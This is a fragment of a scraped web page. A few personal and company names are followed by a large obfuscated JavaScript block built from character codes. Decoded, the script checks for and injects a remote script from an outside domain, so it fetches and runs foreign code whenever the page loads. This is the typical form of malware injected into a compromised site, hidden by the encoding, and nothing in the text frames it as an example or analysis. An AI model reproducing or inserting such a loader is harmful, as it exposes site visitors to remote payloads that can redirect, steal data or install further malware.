My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/